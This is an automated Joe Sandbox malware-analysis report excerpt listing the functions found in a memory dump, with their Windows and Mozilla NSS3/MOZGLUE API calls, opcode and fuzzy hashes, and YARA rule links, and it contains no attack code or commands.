Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 5bc4fa7e58e78b5408316364c0756041c0a3a7fc4d231082a9e68027a7743c68
Instruction ID: 92684b2a84ab1a5df876f86fcee11a836d79b42c1e3ad97940d7832014a8e4be
Opcode Fuzzy Hash: 5bc4fa7e58e78b5408316364c0756041c0a3a7fc4d231082a9e68027a7743c68
Instruction Fuzzy Hash: D32139B4A14605CFDB10AF79D6889AABBB4FF05348F11467ADC9897701E730D894CBE2

Function 6C7628A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7580DD), ref: 6C7628BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C7580DD), ref: 6C7628D3
PR_Unlock.NSS3(?,?,?,?,?,6C7580DD), ref: 6C7628E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C7580DD), ref: 6C76290E
free.MOZGLUE(?,?,?,?,?,?,6C7580DD), ref: 6C76291A

Part of subcall function 6C759270: DeleteCriticalSection.KERNEL32(?,?,6C765089,?,6C763B70,?,?,?,?,?,6C765089,6C75F39B,00000000), ref: 6C75927F
Part of subcall function 6C759270: free.MOZGLUE(?,?,6C763B70,?,?,?,?,?,6C765089,6C75F39B,00000000), ref: 6C759286
Part of subcall function 6C759270: PL_HashTableDestroy.NSS3(?,6C763B70,?,?,?,?,?,6C765089,6C75F39B,00000000), ref: 6C759292

Part of subcall function 6C758B50: TlsGetValue.KERNEL32(00000000,?,6C760948,00000000), ref: 6C758B6B
Part of subcall function 6C758B50: EnterCriticalSection.KERNEL32(?,?,?,6C760948,00000000), ref: 6C758B80
Part of subcall function 6C758B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C760948,00000000), ref: 6C758B8F
Part of subcall function 6C758B50: PR_Unlock.NSS3(?,?,?,?,6C760948,00000000), ref: 6C758BA1
Part of subcall function 6C758B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C760948,00000000), ref: 6C758BAC
Part of subcall function 6C758B50: free.MOZGLUE(?,?,?,?,?,6C760948,00000000), ref: 6C758BB8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 4382a57439e5b9b6d0e37668b130968a37f1192c5c511fd4c58250e9fbc13e91
Instruction ID: 0c12e3f09dab7e200c9bcedf5554f5da4d4c1c4c0e35d24453862986638f234d
Opcode Fuzzy Hash: 4382a57439e5b9b6d0e37668b130968a37f1192c5c511fd4c58250e9fbc13e91
Instruction Fuzzy Hash: FE2139B5A04B059BCB00AF79C18C469BBF4FF45358F014929DC99A7B01EB34E899CBD2

Function 6C7309E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6C7306A2,00000000,?), ref: 6C7309F8
malloc.MOZGLUE(0000001F), ref: 6C730A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C730A33

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

PR_Free.NSS3(?), ref: 6C730A6C
PR_Free.NSS3(?), ref: 6C730A87

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 9cdc9c3d8dfdb2057f018475cd94161d34f2bccdae5af83e61d139cb5b4b0c4e
Instruction ID: 1de70ec99b7ec7f9232496570f78b1f3d6f77590b76920f193ae5ceb42b8aa1d
Opcode Fuzzy Hash: 9cdc9c3d8dfdb2057f018475cd94161d34f2bccdae5af83e61d139cb5b4b0c4e
Instruction Fuzzy Hash: BF1124B1900B908BE7609F69EB8865777E8BB0135CF40693AD81E82E02E731F454C791

Function 6C758FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C760710), ref: 6C758FF1
PR_CallOnce.NSS3(6C8A2158,6C759150,00000000,?,?,?,6C759138,?,6C760710), ref: 6C759029
calloc.MOZGLUE(00000001,00000000,?,?,6C760710), ref: 6C75904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C760710), ref: 6C759066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C760710), ref: 6C759078

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 1be45b81807251413c68e667c1c3e32803552d93c9a2466d4e1a394d2b6c64e9
Instruction ID: b39c0d51ca7c296945aa88260a852fa58c21e1e9c70ca553fca94199a9da6fde
Opcode Fuzzy Hash: 1be45b81807251413c68e667c1c3e32803552d93c9a2466d4e1a394d2b6c64e9
Instruction Fuzzy Hash: D611E5A170011257E7201AEDAE04A6A72A8DB927ACF900931FD4DC6B41FB57CD66C3E5

Function 6C7D4AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6C7D4AD1), ref: 6C7D4B62
free.MOZGLUE(?,00015180,00000005,?,6C7D4AD1), ref: 6C7D4B76

Part of subcall function 6C7D03C0: CloseHandle.KERNEL32(?,?,?,?,6C7D4B27,?,?,00015180,00000005,?,6C7D4AD1), ref: 6C7D03E0
Part of subcall function 6C7D03C0: GetLastError.KERNEL32(?,6C7D4B27,?,?,00015180,00000005,?,6C7D4AD1), ref: 6C7D03FD

Part of subcall function 6C7D03C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6C7D4B27,?,?,00015180,00000005,?,6C7D4AD1), ref: 6C7D0419
Part of subcall function 6C7D03C0: free.MOZGLUE(?,?,6C7D4B27,?,?,00015180,00000005,?,6C7D4AD1), ref: 6C7D0420

CloseHandle.KERNEL32(?,00015180,00000005,?,6C7D4AD1), ref: 6C7D4B96
free.MOZGLUE(?,?,6C7D4AD1), ref: 6C7D4B9D
memset.VCRUNTIME140(6C8A2F9C,00000000,00000090,00015180,00000005,?,6C7D4AD1), ref: 6C7D4BB2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: 1949a17159f743255b2a524ef3bd21b77421d4b4d66b085665efa2244f9a05d7
Instruction ID: d342880ff71d02c7a0ca7ae6e71a61f006bd49eae4cc48e65820afcbb5b752c7
Opcode Fuzzy Hash: 1949a17159f743255b2a524ef3bd21b77421d4b4d66b085665efa2244f9a05d7
Instruction Fuzzy Hash: 8D11E272B01610EBDE329B9AEE0AB4EB734BB1621CF060034F50957A11D332F854E7E6

Function 6C76CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C781E10: TlsGetValue.KERNEL32 ref: 6C781E36
Part of subcall function 6C781E10: EnterCriticalSection.KERNEL32(?,?,?,6C75B1EE,2404110F,?,?), ref: 6C781E4B
Part of subcall function 6C781E10: PR_Unlock.NSS3 ref: 6C781E76

free.MOZGLUE(?,6C76D079,00000000,00000001), ref: 6C76CDA5
PK11_FreeSymKey.NSS3(?,6C76D079,00000000,00000001), ref: 6C76CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C76D079,00000000,00000001), ref: 6C76CDCF
DeleteCriticalSection.KERNEL32(?,6C76D079,00000000,00000001), ref: 6C76CDE2
free.MOZGLUE(?), ref: 6C76CDE9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 918871087e05481818939e3d7a21e5a6625e867da206c79d530cc3af152ba2e5
Instruction ID: 890a1e6169c345dd87d3a2cf52b1ea638638f0fd4be5830675085b2502f532a9
Opcode Fuzzy Hash: 918871087e05481818939e3d7a21e5a6625e867da206c79d530cc3af152ba2e5
Instruction Fuzzy Hash: 1C1170B2B01115BBDF00AE6AEE49996B77CFB0436E7144131EE1987E01E732E424C7E1

Function 6C7D2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C7D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7D5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D2CEC

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_EnterMonitor.NSS3(?), ref: 6C7D2D02
PR_EnterMonitor.NSS3(?), ref: 6C7D2D1F
PR_ExitMonitor.NSS3(?), ref: 6C7D2D42
PR_ExitMonitor.NSS3(?), ref: 6C7D2D5B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: d97e77a2b2945d0092c350bd81faa3e566e9cf746682930d77a81a4d8527be0c
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 490126B2A406046BE7309E29FD45BC7B7A1EF45318F014935E85D86721E232FC16C792

Function 6C7D2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C7D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7D5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D2D9C

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_EnterMonitor.NSS3(?), ref: 6C7D2DB2
PR_EnterMonitor.NSS3(?), ref: 6C7D2DCF
PR_ExitMonitor.NSS3(?), ref: 6C7D2DF2
PR_ExitMonitor.NSS3(?), ref: 6C7D2E0B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 6c01b58651ee4d33bfdff49fcb673b07b28f4a07670bcb21ba7a4133a94c5f9f
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 4B01C8B6A406005BE6309E29FD05BC7B7A5EF41318F054835E95986B12D632F81686A2

Function 6C76AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C753090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C76AE42), ref: 6C7530AA
Part of subcall function 6C753090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7530C7
Part of subcall function 6C753090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7530E5
Part of subcall function 6C753090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C753116
Part of subcall function 6C753090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C75312B
Part of subcall function 6C753090: PK11_DestroyObject.NSS3(?,?), ref: 6C753154
Part of subcall function 6C753090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C75317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7499FF,?,?,?,?,?,?,?,?,?,6C742D6B,?), ref: 6C76AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7499FF,?,?,?,?,?,?,?,?,?,6C742D6B,?), ref: 6C76AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C742D6B,?,?,00000000), ref: 6C76AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C742D6B,?,?,00000000), ref: 6C76AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C742D6B,?,?), ref: 6C76AEA3

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 1857e238321db95942215c6035d3a6394482ee907ab2dbdde6b02b3c7b2eb64a
Instruction ID: ae0433168126058ac8ad20c6632f4e4828b81d056134d8403b84e65da0c423a6
Opcode Fuzzy Hash: 1857e238321db95942215c6035d3a6394482ee907ab2dbdde6b02b3c7b2eb64a
Instruction Fuzzy Hash: B1016DB6B0413057E601A16EAE9BAAB319C8B8776DB080031ED0AD7F01FB15D91587A2

Function 6C850930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C850C83), ref: 6C85094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C850C83), ref: 6C850974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850983
_PR_MD_UNLOCK.NSS3(?,?,6C850C83), ref: 6C85099F
OutputDebugStringA.KERNEL32(?,?,6C850C83), ref: 6C8509B2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 26e03112b1c33841278bb009fd5d2ace96cef86c59d655ad9b9f0744c785a835
Instruction ID: 0f5ebd8fba080875e802ae020b857b5ce796ab37aa27494fec84143a41235337
Opcode Fuzzy Hash: 26e03112b1c33841278bb009fd5d2ace96cef86c59d655ad9b9f0744c785a835
Instruction Fuzzy Hash: 580187B8701240CFDF30AFA8ED88B193BB9AB0230CF0C0634E845C3266C776E850CA91

Function 6C852A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C852A5B
free.MOZGLUE(?), ref: 6C852A6D
strdup.MOZGLUE(?), ref: 6C852A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C852A96
PR_ExitMonitor.NSS3 ref: 6C852AB5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: 89ca0d3f231c0c923c1cb7a3074c71e6436aea02badacd2ff615781a692a9448
Instruction ID: 010def2dabc125bf904b00c02df5e8f5685e404facf1ec14cde953ebb3431b38
Opcode Fuzzy Hash: 89ca0d3f231c0c923c1cb7a3074c71e6436aea02badacd2ff615781a692a9448
Instruction Fuzzy Hash: 68F0F4BAF0112097DE71AFA8AE0D74A7674AB0169DF490430D809D6A11EB7AD828C2C2

Function 6C85ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C85A6D8), ref: 6C85AE0D
free.MOZGLUE(?), ref: 6C85AE14
DeleteCriticalSection.KERNEL32(6C85A6D8), ref: 6C85AE36
free.MOZGLUE(?), ref: 6C85AE3D
free.MOZGLUE(00000000,00000000,?,?,6C85A6D8), ref: 6C85AE47

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: bb66edd6cc7e465874175b96de3052798a19d7247c09546b4e868a5fc51b7b52
Instruction ID: 436f1c0ea4f96782f6cf6e169a603566e011dc643a6894ea66fe7cca1ac9a833
Opcode Fuzzy Hash: bb66edd6cc7e465874175b96de3052798a19d7247c09546b4e868a5fc51b7b52
Instruction Fuzzy Hash: 78F0F6B5201A01A7CA209F6CD848957B7B8BF867797500338E12A83941D732E021C7D5

Function 6C80CA40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 6C80CAAB
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C80CB13
free.MOZGLUE(?), ref: 6C80CC46

Strings

/G6/, xrefs: 6C80CA4B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalLeaveReleaseSectionSemaphorefree
String ID: /G6/
API String ID: 148020285-570549270
Opcode ID: 9d09a05548bca5306975bc298887b9b6893a01846f0e53dd460eb99fab46b808
Instruction ID: 125790468da8548a47fe01eca686be542149d59e67cb3945307406270c4e5a37
Opcode Fuzzy Hash: 9d09a05548bca5306975bc298887b9b6893a01846f0e53dd460eb99fab46b808
Instruction Fuzzy Hash: 60716BB1B007058FCB28DF59CA80699B7B1FF85358F26852DD819AB752E730E902CF90

Function 6C76CA50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

CERT_IsCACert.NSS3(00000000,?), ref: 6C76CACA
CERT_DestroyCertificate.NSS3(?), ref: 6C76CBF3

Part of subcall function 6C761850: PR_EnterMonitor.NSS3(?,?,6C76002B,?), ref: 6C761875
Part of subcall function 6C761850: PR_ExitMonitor.NSS3(?,?,?,?,6C76002B,?), ref: 6C761905

Part of subcall function 6C7606A0: TlsGetValue.KERNEL32 ref: 6C7606C2
Part of subcall function 6C7606A0: EnterCriticalSection.KERNEL32(?), ref: 6C7606D6
Part of subcall function 6C7606A0: PR_Unlock.NSS3 ref: 6C7606EB

CERT_DestroyCertificate.NSS3(?), ref: 6C76CBC6

Part of subcall function 6C742FC0: PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C76C786,?,?,00000000), ref: 6C742FCC

Strings

/G6/, xrefs: 6C76CA5C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
